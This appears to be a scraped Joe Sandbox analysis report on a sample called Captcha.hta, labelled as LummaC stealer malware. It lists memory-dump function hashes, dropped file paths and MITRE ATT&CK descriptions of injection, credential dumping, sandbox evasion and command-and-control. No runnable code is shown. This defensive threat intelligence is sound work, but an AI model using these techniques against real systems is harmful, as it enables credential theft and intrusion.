Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction ID: 34e981112378c59cf45707eac27e4188cbaca79d234523b47ecff1cb0040ee73
Opcode Fuzzy Hash: 7d6529698e20a6c769e7980251b0ca5e132cff0518f497c1ab8b00d6e4c79072
Instruction Fuzzy Hash: 59016DB9C00624EFEF00AF55DC01B9E77B6AB0A324F0414A5E508BB392D731ED10CB95

Function 0043CA93 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction ID: 76115147780e5b0d0309e2a0309811062aead7e9691d40ac881d7231c88a4ab0
Opcode Fuzzy Hash: 3b41fa5205d4ae5a3fd68479d9a62f5c8f3548fe329d4af70c97534e327c91f5
Instruction Fuzzy Hash: 23E0D8FFD556600397548A235C02226B1936BDA628B1AB8788E9673707EA359C0741D8

Function 00423086 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D

Function 00427AD3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E

Function 0041C653 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E

Function 0040BFFD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 0042984F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E

Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043179A

Strings

O, xrefs: 0043187B
J, xrefs: 00431885
/, xrefs: 00431867
#, xrefs: 00431899
~, xrefs: 004318C1
B, xrefs: 00431871
m, xrefs: 004318B7
4, xrefs: 00431821
0, xrefs: 00431980
n, xrefs: 004318D1
0, xrefs: 0043182B
{, xrefs: 004318E1
Q, xrefs: 00431853
;, xrefs: 00431817
], xrefs: 00431849
H, xrefs: 004318AD
, xrefs: 0043183F
^, xrefs: 0043185D
B, xrefs: 0043188F
G, xrefs: 004318A3

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431360

Strings

B, xrefs: 00431437
B, xrefs: 00431455
0, xrefs: 004313F1
m, xrefs: 0043147D
, xrefs: 00431405
4, xrefs: 004313E7
], xrefs: 0043140F
Q, xrefs: 00431419
H, xrefs: 00431473
{, xrefs: 004314A7
~, xrefs: 00431487
O, xrefs: 00431441
;, xrefs: 004313DD
^, xrefs: 00431423
J, xrefs: 0043144B
#, xrefs: 0043145F
n, xrefs: 00431497
/, xrefs: 0043142D
0, xrefs: 0043153F
G, xrefs: 00431469

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042E9F6
VariantInit.OLEAUT32 ref: 0042EA05

Strings

,, xrefs: 0042EA90
-, xrefs: 0042EA94
Q, xrefs: 0042EA2C
6, xrefs: 0042EA78
T, xrefs: 0042EA24
8, xrefs: 0042EA40
0, xrefs: 0042EA60
2, xrefs: 0042EA68
., xrefs: 0042EA98
4, xrefs: 0042EA70
(, xrefs: 0042EA80
*, xrefs: 0042EA88
W, xrefs: 0042EA34
b, xrefs: 0042EA3C
:, xrefs: 0042EA48
<, xrefs: 0042EA50
>, xrefs: 0042EA58

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6

Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F83F
VariantInit.OLEAUT32 ref: 0042F84E

Strings

0, xrefs: 0042F8AF
6, xrefs: 0042F8C7
*, xrefs: 0042F8D7
T, xrefs: 0042F873
<, xrefs: 0042F89F
4, xrefs: 0042F8BF
b, xrefs: 0042F88B
:, xrefs: 0042F897
Q, xrefs: 0042F87B
(, xrefs: 0042F8CF
,, xrefs: 0042F8DF
2, xrefs: 0042F8B7
-, xrefs: 0042F8E3
W, xrefs: 0042F883
>, xrefs: 0042F8A7
8, xrefs: 0042F88F
., xrefs: 0042F8E7

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66

Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043244F

Strings

X, xrefs: 00432477
[, xrefs: 004324DB
@, xrefs: 004324E5
L, xrefs: 004324BD
H, xrefs: 004324D1
C, xrefs: 00432481
X, xrefs: 0043246D
@, xrefs: 004324A9
[, xrefs: 004324C7
J, xrefs: 0043248B
e, xrefs: 004324B3
A, xrefs: 004324EA
Q, xrefs: 0043249F
E, xrefs: 00432495

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757

Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004321C6

Strings

L, xrefs: 0043223B
H, xrefs: 0043224F
@, xrefs: 00432263
[, xrefs: 00432245
@, xrefs: 00432227
C, xrefs: 004321FF
E, xrefs: 00432213
[, xrefs: 00432259
Q, xrefs: 0043221D
A, xrefs: 00432268
X, xrefs: 004321EB
X, xrefs: 004321F5
J, xrefs: 00432209
e, xrefs: 00432231

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757

Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431EE7
VariantInit.OLEAUT32 ref: 00431EFA

Strings

z, xrefs: 00431F2F
A, xrefs: 00431F8F
e, xrefs: 00431F5F
w, xrefs: 00431F4F
v, xrefs: 00431F3F
e, xrefs: 00431F1F
p, xrefs: 00431FBF
n, xrefs: 00431FAF
p, xrefs: 00431F9F
z, xrefs: 00431F6F

Memory Dump Source

Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
Opcode Fuzzy Hash: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction Fuzzy Hash: 2641383160C7C18ED331DB38885879BBFD1ABA6324F088AADD4E9872D6D7794505C763

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Captcha.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.0.cs

C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.cmdline

C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.dll

C:\Users\user\AppData\Local\Temp\0bqs2aon\0bqs2aon.out

C:\Users\user\AppData\Local\Temp\0bqs2aon\CSCCC253661431F432090E0BD8713DD5F5.TMP

C:\Users\user\AppData\Local\Temp\RES1090.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhnkmr1l.5py.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mli0y3mh.qvs.ps1

Windows Analysis Report
Captcha.hta

Function 079125A0 Relevance: 10.5, Strings: 8, Instructions: 514
COMMON

Function 07911F70 Relevance: 9.2, Strings: 7, Instructions: 496
COMMON

Function 079122BC Relevance: 3.9, Strings: 3, Instructions: 106
COMMON

Function 04E569EC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 04E569F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 04E56768 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 04E56770 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 04E565D1 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre